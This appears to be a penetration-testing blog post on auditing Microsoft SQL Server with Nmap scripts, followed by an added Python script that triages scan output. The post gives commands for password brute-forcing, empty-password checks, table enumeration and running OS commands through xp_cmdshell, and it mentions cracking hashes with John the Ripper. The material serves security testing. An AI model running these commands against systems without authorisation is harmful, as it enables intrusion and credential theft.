The Nmap Scripting Engine (NSE) lets us use Nmap not only as a port scanner but as a complete penetration testing platform.
In this post we will look at some techniques we can apply on a network to check Microsoft SQL Server installations.
By default, SQL Server instances usually listen on TCP port 1433.
Opening nmap, we can give the following command:
nmap -p1433 --script ms-sql-info xxx.xxx.xxx.xxx (the IP address of the SQL Server host). The combination of Nmap and the Nmap Scripting Engine immediately gives us information about the SQL Server version as well as the instance name.
The Nmap Scripting Engine also includes ms-sql-brute, which checks for weak passwords.
The command is nmap -p1433 --script ms-sql-brute xxx.xxx.xxx.xxx. If this finds nothing, we can use a custom password list; assuming the file with the passwords is pass.txt, the command becomes:
nmap -p1433 --script ms-sql-brute --script-args userdb=/var/pass.txt,passdb=/var/pass.txt xxx.xxx.xxx.xxx
At the same time, the Nmap Scripting Engine lets us find empty passwords in infrastructures running Microsoft SQL Server.
The command would be as follows:
nmap -p1433 --script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account has no password. To find which databases sa has access to, we use the ms-sql-hasdbaccess script with the following arguments:
nmap -p1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa xxx.xxx.xxx.xxx
Then we can list the tables in those databases with the following command:
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL Server 2000) xp_cmdshell is enabled by default, and we can execute operating system commands through Nmap scripts such as:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa xxx.xxx.xxx.xxx
Continuing:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa xxx.xxx.xxx.xxx
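As an added defender-side example (not code from the original post), the following Python script reads the normal-format (-oN) output of the ms-sql-info and ms-sql-empty-password scripts from an authorised scan of our own network and flags the hosts that need remediation first: those where sa has no password, and those running SQL Server 2000 or older, where xp_cmdshell is on by default. The sample scan text, the host addresses and the exact output layout are constructed assumptions modelled on the scripts' documented output.

```python
import re

# Constructed sample shaped like Nmap normal output (-oN) for the ms-sql-info
# and ms-sql-empty-password scripts; it is not a capture from a real scan.
SAMPLE_SCAN = """\
Nmap scan report for 10.0.0.5
| ms-sql-info:
|   10.0.0.5:1433:
|     Version:
|       name: Microsoft SQL Server 2000 SP4
|       number: 8.00.2039
| ms-sql-empty-password:
|   [10.0.0.5\\MSSQLSERVER]
|_    sa:<empty> => Login Success
Nmap scan report for 10.0.0.6
| ms-sql-info:
|   10.0.0.6:1433:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
"""
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
NUMBER_RE = re.compile(r"number:\s*(\d+)\.")  # leading field = engine major version
EMPTY_SA_RE = re.compile(r"\bsa:<empty> => Login Success")


def triage(scan_text):
    """Map each host in the scan text to the findings a defender should act on."""
    findings, host = {}, None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            findings[host] = {"major": None, "empty_sa": False, "xp_cmdshell_default_on": False}
            continue
        if host is None:
            continue
        m = NUMBER_RE.search(line)
        if m:
            major = int(m.group(1))
            findings[host]["major"] = major
            # xp_cmdshell ships enabled on SQL Server 2000 (8.x) and earlier; off by default from 2005 (9.x)
            findings[host]["xp_cmdshell_default_on"] = major <= 8
        if EMPTY_SA_RE.search(line):
            findings[host]["empty_sa"] = True
    return findings


def hosts_needing_action(findings):
    """Hosts with an empty sa password or an xp_cmdshell-on-by-default engine."""
    return sorted(h for h, f in findings.items() if f["empty_sa"] or f["xp_cmdshell_default_on"])
```

Run it against a real -oN file by passing its contents to triage(); the flagged hosts are the ones to fix first (set an sa password, disable xp_cmdshell via sp_configure, or retire the legacy engine).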
We should also mention that Nmap and the Nmap Scripting Engine can be used together with other tools such as John the Ripper: we can extract the database password hashes and then proceed to password cracking with John the Ripper.
Warm thanks to SecTeam @johnzontos.